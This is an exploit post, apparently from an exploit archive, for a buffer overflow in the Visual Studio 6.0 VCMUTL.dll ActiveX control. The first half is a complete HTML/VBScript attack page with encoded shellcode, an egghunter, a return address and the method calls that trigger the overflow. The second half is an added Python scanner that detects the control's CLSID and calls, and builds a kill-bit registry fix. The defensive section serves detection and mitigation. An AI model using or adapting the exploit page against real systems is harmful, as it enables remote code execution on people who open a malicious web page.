Microsoft Visual Studio 6.0 (VCMUTL.dll) 0day Unicode ActiveX Buffer Overflow
Source: Sec4ever.com  Author: MadjiX  Published: 2010-07-28

########################################################################################
#                                                           _                          #
#                           .-----.--.--.--.----.----.-.---| |                         #
#                           |  _  |  |  |  |     |  -__|  _  |                         #
#                           |   __|________|__|__|_____|_____|                         #
#                           |__|        By MadjiX                                      #
#                                      Sec4ever.com                                    #
########################################################################################
#Title : Microsoft visual studio 6.0 (VCMUTL.dll) 0day unicode ActiveX Buffer overflow #
#author : MadjiX <Dz8[]Hotmail{}com>                                                   #
#Gr33tz : His0k4 , Bibi-info , Sud0 , corelancod3r , volc4n0 , mr_me , Shadow-Devil    #
########################################################################################

Exploit:
<html>
<object classid='clsid:723AA6D1-3B50-11D1-9636-00600818410C' id='target'></object>
<script language='vbscript'>

shellcode = unescape("%u7a44%u3732%u7a44%u3732%u03eb%ueb59%ue805%ufff8%uffff") & _
   unescape("%u494f%u4949%u4949%u5149%u565a%u5854%u3336%u5630%u3458") & _
   unescape("%u3041%u3642%u4848%u4230%u3033%u4342%u5856%u4232%u4244") & _
   unescape("%u3448%u3241%u4441%u4130%u5444%u4442%u4251%u4130%u4144") & _
   unescape("%u5856%u5a34%u4238%u4a44%u4d4f%u4f4e%u4e4a%u3446%u5042") & _
   unescape("%u5042%u5042%u384b%u3445%u534e%u584b%u374e%u3045%u574a") & _
   unescape("%u3041%u4e4f%u384b%u344f%u314a%u584b%u454f%u3242%u3041") & _
   unescape("%u4e4b%u3449%u584b%u3346%u484b%u3041%u4e50%u5341%u4c42") & _
   unescape("%u4949%u4a4e%u4846%u4c42%u5746%u3047%u4c41%u4c4c%u304d") & _
   unescape("%u3041%u4c44%u4e4b%u4f46%u434b%u5546%u3246%u3046%u5745") & _
   unescape("%u4e45%u584b%u454f%u3246%u5041%u4e4b%u3648%u584b%u304e") & _
   unescape("%u544b%u584b%u554f%u514e%u5041%u4e4b%u484b%u414e%u484b") & _
   unescape("%u3041%u4e4b%u5849%u454e%u5246%u5046%u4c43%u5341%u4c42") & _
   unescape("%u4646%u384b%u3442%u5342%u4845%u4c42%u574a%u304e%u484b") & _
   unescape("%u3442%u504e%u384b%u5742%u314e%u4a4d%u584b%u364a%u304a") & _
   unescape("%u4e4b%u5049%u484b%u5842%u4b42%u3042%u3042%u3042%u384b") & _
   unescape("%u464a%u334e%u454f%u5341%u4f48%u4642%u5548%u3849%u4f4a") & _
   unescape("%u4843%u4c42%u474b%u3542%u564a%u5750%u4d4a%u4e44%u3743") & _
   unescape("%u364a%u494a%u4f50%u384c%u5050%u4547%u4f4f%u4e47%u5643") & _
   unescape("%u4641%u364e%u5643%u5042%u5a5a")

buffer1 = string(262, "A")
ecx = unescape("%u0090%u0090")
eip = unescape("%u048b%u0041") ' same return address reported for (sp3 en) and (sp3 fr)
fill = string(4, "A")
nop = string(600, "A")

egg = egg + "TUYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARA"
egg = egg + "LAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQI"
egg = egg + "AIQI111AIAJQYAZBABABABABkMAGB9u4JBaVRaxJYoLOm"
egg = egg + "rpRbJKR0XvmLnmlKUNzSDhotxOTsJNRnWdKXzTo3EzJvO"
egg = egg + "bUWwyoWwZjA"

exploit = buffer1 + eip + fill + ecx + egg
target.IsRegisterableDll shellcode
target.IsRegisterableDll shellcode
target.IsRegisterableDll shellcode
target.RegisterApplication exploit
</script>
</html>
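The exploit above instantiates the VCMUTL.dll control by CLSID and then calls two of its methods, which gives a defender two concrete handles: the `<object classid='clsid:723AA6D1-...'>` tag and the `IsRegisterableDll` / `RegisterApplication` calls can be detected in captured or proxied HTML, and the control can be prevented from loading in Internet Explorer with a kill bit. The following is an added example written for this page, not code from the original post or from Sec4ever.com. The CLSID and method names are copied from the exploit itself; the sample HTML is constructed (payload replaced by filler), and the registry key and the `Compatibility Flags = 0x400` value are Microsoft's standard kill-bit mechanism (KB 240797).

```python
"""Defensive companion to the exploit above: detection and kill-bit mitigation.

Added example, not part of the original post. Everything specific to the control
(the CLSID and the two method names) is taken from the exploit's own <object> tag
and script; the sample HTML at the bottom is constructed for illustration.
"""
import re

# CLSID of the VCMUTL.dll control, copied from the exploit's <object classid=...>.
VCMUTL_CLSID = "723AA6D1-3B50-11D1-9636-00600818410C"

# Methods the exploit invokes on the control.
SUSPICIOUS_METHODS = ("IsRegisterableDll", "RegisterApplication")

# Matches the CLSID with or without braces, in any case ("clsid:{...}" and "CLSID:...").
CLSID_RE = re.compile(r"clsid:\s*\{?" + re.escape(VCMUTL_CLSID) + r"\}?", re.IGNORECASE)


def find_activex_ids(html):
    """Return the id attribute of every <object> tag that instantiates the CLSID.

    Objects without an id attribute are reported as None so the caller still learns
    that the control was instantiated.
    """
    ids = []
    for tag_match in re.finditer(r"<object\b[^>]*>", html, re.IGNORECASE):
        tag = tag_match.group(0)
        if CLSID_RE.search(tag):
            # \bid avoids matching the "id" inside "classid" or "clsid".
            id_match = re.search(r"\bid\s*=\s*['\"]?([\w-]+)", tag, re.IGNORECASE)
            ids.append(id_match.group(1) if id_match else None)
    return ids


def find_method_calls(html, object_id):
    """Return (method, count) pairs for the suspicious methods called on object_id."""
    calls = []
    for method in SUSPICIOUS_METHODS:
        pattern = re.compile(
            r"\b" + re.escape(object_id) + r"\s*\.\s*" + method + r"\b", re.IGNORECASE
        )
        count = len(pattern.findall(html))
        if count:
            calls.append((method, count))
    return calls


def scan_html(html):
    """Return one finding per instantiation of the control found in html."""
    findings = []
    for object_id in find_activex_ids(html):
        methods = find_method_calls(html, object_id) if object_id else []
        findings.append({
            "id": object_id,
            "methods": methods,
            "verdict": ("control instantiated and vulnerable methods called"
                        if methods else "control instantiated"),
        })
    return findings


def killbit_reg(clsid=VCMUTL_CLSID):
    """Return .reg text that sets the Internet Explorer kill bit for clsid.

    The key path and the 0x400 'Compatibility Flags' value are Microsoft's standard
    kill-bit mechanism (KB 240797); once applied, IE refuses to load the control.
    """
    key = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer"
           r"\ActiveX Compatibility\{" + clsid.upper() + "}")
    return ("Windows Registry Editor Version 5.00\r\n\r\n"
            "[" + key + "]\r\n"
            "\"Compatibility Flags\"=dword:00000400\r\n")


# Constructed sample: same structure as the exploit page, payload replaced by filler,
# with mixed-case attributes and a braced CLSID to show the matching is tolerant.
SAMPLE_HTML = """<html>
<OBJECT CLASSID="CLSID:{723aa6d1-3b50-11d1-9636-00600818410c}" ID="target"></OBJECT>
<script language='vbscript'>
filler = string(262, "A")
target.IsRegisterableDll filler
target.IsRegisterableDll filler
target.IsRegisterableDll filler
target.RegisterApplication filler
</script>
</html>"""

# Constructed benign page using a placeholder CLSID that is not the vulnerable control.
BENIGN_HTML = "<object classid='clsid:00000000-0000-0000-0000-000000000000' id='x'></object>"

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(finding)
    print(killbit_reg())
```

Run against the sample, the scanner reports one finding for `target` with three `IsRegisterableDll` calls and one `RegisterApplication` call, and nothing for the benign page. The `.reg` text can be imported on affected machines to set the kill bit; it blocks the control in the browser without touching the Visual Studio installation itself.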